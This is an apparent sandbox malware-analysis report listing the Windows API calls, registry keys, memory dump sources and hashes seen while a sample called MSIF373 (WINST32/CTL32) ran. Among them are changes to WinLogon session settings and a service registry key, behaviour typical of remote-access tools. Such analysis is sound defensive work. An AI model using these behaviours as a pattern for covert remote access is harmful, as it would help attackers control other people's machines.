                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseValue
                                                                                          • String ID: Policy
                                                                                          • API String ID: 3132538880-4157669408
                                                                                          • Opcode ID: 601b31b980fe2b446436ce92d0b7dc65eeb41ffd316078cca65509a808213b8d
                                                                                          • Instruction ID: 48a56669b30cddb8d15192482aa8db39ed7dec141b73cf3eeaaf965512827091
                                                                                          • Opcode Fuzzy Hash: 601b31b980fe2b446436ce92d0b7dc65eeb41ffd316078cca65509a808213b8d
                                                                                          • Instruction Fuzzy Hash: 1E014B72640700ABD630DAAADC91F97F3EDFB89B21F04891EB65593690C6B0FC44CB64
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,752F55F0,?,005B0C46,?,005B9820,?,00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B0BA5
                                                                                          • GetVersion.KERNEL32(?,005B0C46,?,005B9820,?,00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B0BC0
                                                                                          • SetLastError.KERNEL32(00000000,?,005B0C46,?,005B9820,?,00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B0BD7
                                                                                          • ExitProcess.KERNEL32 ref: 005B0C19
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$ExitProcessVersion
                                                                                          • String ID: Z\
                                                                                          • API String ID: 3002118274-3850713075
                                                                                          • Opcode ID: 15882f4d1adfe201743db80048fc63dba749e803a3acb0a015ce78bd1e41328c
                                                                                          • Instruction ID: 638035b2c5a7b5491e039497724b458b4133ab4cd72f58e16afd8f6b8a300c90
                                                                                          • Opcode Fuzzy Hash: 15882f4d1adfe201743db80048fc63dba749e803a3acb0a015ce78bd1e41328c
                                                                                          • Instruction Fuzzy Hash: 4A014F706012099FEB10AF64EC9ABEB7BA9BF05364F14B105FE14822D2E734ED4186B1
                                                                                          APIs
                                                                                          • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000004,?,?,00000000,?,?,005BE73F,00000000,0059A1FF), ref: 005BE6DC
                                                                                          • RegCloseKey.ADVAPI32(?,00000000,?,?,005BE73F,00000000,0059A1FF), ref: 005BE6E5
                                                                                          • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,?,?,00000000,?,?,005BE73F,00000000,0059A1FF), ref: 005BE712
                                                                                          • RegCloseKey.ADVAPI32(?,00000000,?,?,005BE73F,00000000,0059A1FF), ref: 005BE71B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseValue
                                                                                          • String ID: Policy
                                                                                          • API String ID: 3132538880-4157669408
                                                                                          • Opcode ID: e39795ad62d2e517a4f68dd4a25f08a720f95ba601e539f45f4fb5cd749773a8
                                                                                          • Instruction ID: 6b29cb1a01c6498085a7b257ed5524b932be4a5a55d081219f9c36d106ae7bcc
                                                                                          • Opcode Fuzzy Hash: e39795ad62d2e517a4f68dd4a25f08a720f95ba601e539f45f4fb5cd749773a8
                                                                                          • Instruction Fuzzy Hash: 4501E17164070467D735CA75DC46FD2B3EDAB58705F18491DB36A97180C6B4B8448B61
                                                                                          APIs
                                                                                          • LoadStringW.USER32(00000000,?,?,00000847), ref: 005C8A88
                                                                                          • wsprintfW.USER32 ref: 005C8A9E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LoadStringwsprintf
                                                                                          • String ID: #%d$..\CTL32\util.cpp$i < cchBuf
                                                                                          • API String ID: 104907563-2369523344
                                                                                          • Opcode ID: 39edf9ba2f9a623852d100cb936da3f3c2cbcbf1beadeac663d2d6cfbe98e975
                                                                                          • Instruction ID: f97d138d1ab93948e8847deffa876f501c4cd8b3ee820d4aa2f1ac72344f9f62
                                                                                          • Opcode Fuzzy Hash: 39edf9ba2f9a623852d100cb936da3f3c2cbcbf1beadeac663d2d6cfbe98e975
                                                                                          • Instruction Fuzzy Hash: A2F0FC766002057BC7109B98EC59DEB7B5EFE85754B085026F904D3141EE71ED0087B1
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005D2E27
                                                                                          • MessageBoxW.USER32(00000000,?,WINST32,00000000), ref: 005D2E40
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Messagewsprintf
                                                                                          • String ID: Invalid Parameter %c%cCommand Line: <%s>Version: %s$V14.10$WINST32
                                                                                          • API String ID: 300413163-1732868714
                                                                                          • Opcode ID: 2ab6917feb179e6c56644fbedd8c722c242583998af3082b8865b9986a990fde
                                                                                          • Instruction ID: 78e6725d9bcfea2dd657d9346ffcebe9fc61e7cd696a1e486db092151362ee32
                                                                                          • Opcode Fuzzy Hash: 2ab6917feb179e6c56644fbedd8c722c242583998af3082b8865b9986a990fde
                                                                                          • Instruction Fuzzy Hash: ABF06874B44208ABD750DF94EC46F6A376AFB44701F458165FA499B2C0E970AA048BE5
                                                                                          APIs
                                                                                          • EnumWindows.USER32(Function_0002E090,?), ref: 005BE792
                                                                                          • OpenDesktopW.USER32(Winlogon,00000000,00000000,02000000), ref: 005BE7B0
                                                                                          • EnumDesktopWindows.USER32(00000000,Function_0002E090,?), ref: 005BE7BF
                                                                                          • CloseDesktop.USER32(00000000,?,005BE7EE), ref: 005BE7C6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$EnumWindows$CloseOpen
                                                                                          • String ID: Winlogon
                                                                                          • API String ID: 1029573575-744610081
                                                                                          • Opcode ID: 0265adf8152b13aeaeaca5314405beccc12f3110afd8693e5634473f6c46fa7d
                                                                                          • Instruction ID: 83d85c229d57d62bb7952b81cc09b5c0212388c0056c1f096ffaf182d6da04b8
                                                                                          • Opcode Fuzzy Hash: 0265adf8152b13aeaeaca5314405beccc12f3110afd8693e5634473f6c46fa7d
                                                                                          • Instruction Fuzzy Hash: 8EF0A771A007907BF72217209C9DFD66F5FFB95B55F1C6125F201B1241CBA42C40C6B4
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll), ref: 005C6853
                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 005C6865
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005C6875
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                          • API String ID: 145871493-545709139
                                                                                          • Opcode ID: 3a4b236cb48376f508c38ed4b458c1881f7092457fa75596103347ffe0755064
                                                                                          • Instruction ID: 544929a8cbb1e389a607ec9f5ca7eb9fe692f705050414ad61daaab4254b54e0
                                                                                          • Opcode Fuzzy Hash: 3a4b236cb48376f508c38ed4b458c1881f7092457fa75596103347ffe0755064
                                                                                          • Instruction Fuzzy Hash: E2F0EC71605A220FD3318F79AC55BEE39E7EFD2760B465525F425D31E0C724898096A2
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\WinLogon,00000000,0002001F,?), ref: 005D5052
                                                                                          • RegSetValueExW.ADVAPI32(00000000,AllowMultipleTSSessions,00000000,00000004,00000000,00000004), ref: 005D5083
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 005D508D
                                                                                          Strings
                                                                                          • AllowMultipleTSSessions, xrefs: 005D506D
                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\WinLogon, xrefs: 005D5041
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenValue
                                                                                          • String ID: AllowMultipleTSSessions$Software\Microsoft\Windows NT\CurrentVersion\WinLogon
                                                                                          APIs
                                                                                          • IsWindow.USER32(?), ref: 005B42D9
                                                                                          • SendMessageW.USER32(?,0000045B,?,00000000), ref: 005B430D
                                                                                          • SendMessageW.USER32(?,00000445,00000000,04000000), ref: 005B431C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window
                                                                                          • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • ExitThread.KERNEL32 ref: 005AE387
                                                                                          • Sleep.KERNEL32(00000064), ref: 005AE3A2
                                                                                          • EnumWindows.USER32(Function_0001DA50,00000000), ref: 005AE3BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$EnumExitLocalSleepThreadTimeWindowswvsprintf
                                                                                          • String ID: Kill Thread$StartThread
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,System\CurrentControlSet\Services\pcisys,00000000,00020006,?), ref: 005AEA29
                                                                                          • RegDeleteValueW.ADVAPI32(?,DisplayPath), ref: 005AEA3C
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AEA46
                                                                                          Strings
                                                                                          • System\CurrentControlSet\Services\pcisys, xrefs: 005AEA1F
                                                                                          • DisplayPath, xrefs: 005AEA36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseDeleteOpenValue
                                                                                          • String ID: DisplayPath$System\CurrentControlSet\Services\pcisys
                                                                                          APIs
                                                                                          • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 005C4C8B
                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 005C4CAC
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C4CD8
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005C4CF9
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 005C4D1B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharFileMultiWide$CreateModuleNameQueryVirtual
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • Beep.KERNEL32(00000000,00000000), ref: 005C4119
                                                                                          • MessageBeep.USER32(00000000), ref: 005C412B
                                                                                          • MessageBeep.USER32(-00000010), ref: 005C413F
                                                                                          • PlaySoundW.WINMM(0063B7E8,00000000,00020001), ref: 005C4155
                                                                                          • MessageBeep.USER32(?), ref: 005C4161
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Beep$Message$PlaySound
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 005C4930
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005C4943
                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005C4963
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 005C4990
                                                                                          • VerQueryValueW.VERSION(?,0061A1FC,?,?,?,?,00000000,00000000), ref: 005C49D1
                                                                                            • Part of subcall function 005E79A7: HeapFree.KERNEL32(00000000,00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79BD
                                                                                            • Part of subcall function 005E79A7: GetLastError.KERNEL32(00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$HeapInfoModuleVersion$AllocateErrorFreeHandleLastNameQuerySizeValue
                                                                                          • String ID:
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Global$FreeUnlock$DeleteObject
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000042), ref: 005B6AE5
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 005B6AFA
                                                                                          • CreatePalette.GDI32(00000000), ref: 005B6B5C
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B6B68
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B6B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Global$AllocCreateFreeLockPaletteUnlock
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(0061B478,00000000,00000001,0061B488,?), ref: 005A6E92
                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 005A6EB9
                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 005A6ED2
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 005A6F0A
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 005A6F0D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: String$AllocFree$CreateInstance
                                                                                          • String ID:
                                                                                          • API String ID: 1867060851-0
                                                                                          • Opcode ID: 6a0d24385ab386c2150ea23dda54a0e19ea32c4f37b517225498089f13a8ac09
                                                                                          • Instruction ID: 435d1d7d009b0bd03c658fc8b7862fd912ae442d15d29dc286148df153b0a44b
                                                                                          • Opcode Fuzzy Hash: 6a0d24385ab386c2150ea23dda54a0e19ea32c4f37b517225498089f13a8ac09
                                                                                          • Instruction Fuzzy Hash: 49213BB5600104AFDB00DFA9DC85E9ABBEDFF8A314B1481A5F808DB355D670EE01CBA0
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 005AB10B
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 005AB14B
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AB1A3
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 005AB1AB
                                                                                            • Part of subcall function 005AB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,?), ref: 005AB196
                                                                                          Similarity
                                                                                          • API ID: Enum$CloseDeleteOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2095303065-0
                                                                                          • Opcode ID: 11b1a03e81197a4bb9a28175eaeabfe2a676e151d91bf71619f3f28b27d40605
                                                                                          • Instruction ID: a5371933706850eebfcb936c2597a278481a17a311ba6c4292c61a2a21f54160
                                                                                          • Opcode Fuzzy Hash: 11b1a03e81197a4bb9a28175eaeabfe2a676e151d91bf71619f3f28b27d40605
                                                                                          • Instruction Fuzzy Hash: 462121B590021DABEB20DB54DC58FFB77BDEB48704F008199F91996152DB70AE448FB0
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 005FA73C
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 005FA748
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FA750
                                                                                          • GetTickCount.KERNEL32 ref: 005FA758
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 005FA764
                                                                                          Similarity
